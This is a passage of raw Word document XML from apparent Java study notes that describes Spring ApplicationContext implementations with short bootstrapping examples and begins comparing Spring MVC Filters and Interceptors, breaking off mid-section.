          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides support for internationalization (i18n) by enabling the retrieval of messages from property files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A5F47B" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1899"/>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AOP support</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Integrates seamlessly with Spring AOP (Aspect-Oriented Programming) to apply cross-cutting concerns like logging, security, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0C68A" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1899"/>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Application context configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can be configured using XML, annotations, or Java-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED43EB" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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Types of ApplicationContext in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51537985" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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lastRenderedPageBreak/>
        <w:t>Different types of ApplicationContext provide specific features depending on the use case. The most common types of ApplicationContext are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69B36B" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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1. ClassPathXmlApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1414CA05" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1900"/>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It loads the Spring context from an XML file located in the classpath. This was the traditional way of configuring Spring before annotations became popular.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96D37E" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1900"/>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Useful when you have a lot of legacy code or need to maintain XML-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413C7306" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47157689" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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ApplicationContext context = new ClassPathXmlApplicationContext("beans.xml");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7138F1" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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2. AnnotationConfigApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA240DB" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1901"/>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This is used for Java-based configuration, which is often more type-safe and easier to maintain compared to XML-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9EDA17" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1901"/>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It allows you to define beans using annotations like @Component, @Configuration, @Bean, and scan the classpath for components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B217799" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF62137" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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ApplicationContext context = new AnnotationConfigApplicationContext(AppConfig.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766525E6" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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3. GenericWebApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216BF07A" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1902"/>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This is used specifically for web applications, as it provides additional support for web-related functionality in Spring, such as integrating with Spring MVC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F53EFA" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1902"/>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It is used in web applications configured with Spring Boot or a standard Spring Web MVC application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7DE1AD" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47700E" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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GenericWebApplicationContext context = new GenericWebApplicationContext();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA2AA7E" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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context.register(AppConfig.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317382B5" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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context.refresh();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376A38EA" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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4. GenericApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011636B6" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1903"/>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This is a flexible, generic implementation of ApplicationContext that is used for general-purpose Spring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3DA574" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1903"/>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It can be used when you're not working specifically with web applications, allowing a more general approach to Spring configuration with Java-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74013BF7" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E665C74" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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GenericApplicationContext context = new GenericApplicationContext();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F5B35E" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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context.register(AppConfig.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EF0646" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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context.refresh();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D07F34" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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5. FileSystemXmlApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ACA436" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190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It is similar to ClassPathXmlApplicationContext, but instead of loading the configuration from the classpath, it loads the Spring context from an XML file located anywhere in the file system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E249FE8" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190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It is useful when the XML configuration file is not bundled in the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E175D85" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116BBA25" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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ApplicationContext context = new FileSystemXmlApplicationContext("file:/path/to/beans.xml");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD0D69C" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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6. GenericWebApplicationContext (Spring Boot-specific):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C60F37" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1905"/>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In Spring Boot, this is used for initializing and bootstrapping a Spring-based web application. It integrates with Spring MVC and other web modules to make development faster and easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2342843A" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D77757" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1906"/>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ApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the heart of the Spring IoC container and manages the lifecycle and configuration of beans in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A2F60" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1906"/>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It provides additional features over the basic BeanFactory container, such as event propagation, internationalization, and AOP support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C86FDC" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1906"/>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There are different types of ApplicationContext implementations, including ClassPathXmlApplicationContext, AnnotationConfigApplicationContext, GenericApplicationContext, and GenericWebApplicationContext, each catering to different types of application setups and configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05768E55" w14:textId="0F8F5570" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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71D7147">
          <v:rect id="_x0000_i2121" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C6C4C" w14:textId="67245DC5" w:rsidR="006164D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00E51CDA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="447" w:name="_Toc196307927"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Filter and Interceptor in Spring MVC</w:t>
      </w:r>
      <w:r w:rsidR="006164D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="447"/>
    </w:p>
    <w:p w14:paraId="7DA7BA2D" w14:textId="7192E8DE" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Interceptors</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring MVC are both used to handle preprocessing and postprocessing of HTTP requests, but they serve different purposes and are implemented in different layers of the application. Here's a breakdown of the key differences between them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269E3C3F" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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1. Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A05F2" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1907"/>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lastRenderedPageBreak/>
        <w:t>Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A filter is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet API</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and works at the level of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet container</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Tomcat). It performs tasks before the request reaches the servlet or after the response leaves the servlet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2742CC37" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1907"/>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Interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: An interceptor is a Spring-specific mechanism that is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It works at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller level</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is often used for tasks like logging, authentication, and modifying the model data before and after the controller method execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A10F67" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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2. Scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D8CFD0" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1908"/>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Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Filters are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet container</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and operate on the entire request and response lifecycle. Filters are configured in web.xml or using annotations, and they can be used for things like authentication, logging, and request/response modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A93FE5" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1908"/>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Interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Interceptors are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> framework and are used in the request handling lifecycle, specifically in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> layer. They are configured in the Spring configuration file (@Configuration) or using Java config.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D050C27" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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3. Point of Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B03DD0" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1909"/>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Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Filters are executed before the request reaches the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and after the response leaves the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., before and after the entire Spring MVC processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154021F7" w14:textId="77777777" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="00644808" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1909"/>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Interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Interceptors are executed before and after the controller method is invoked by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
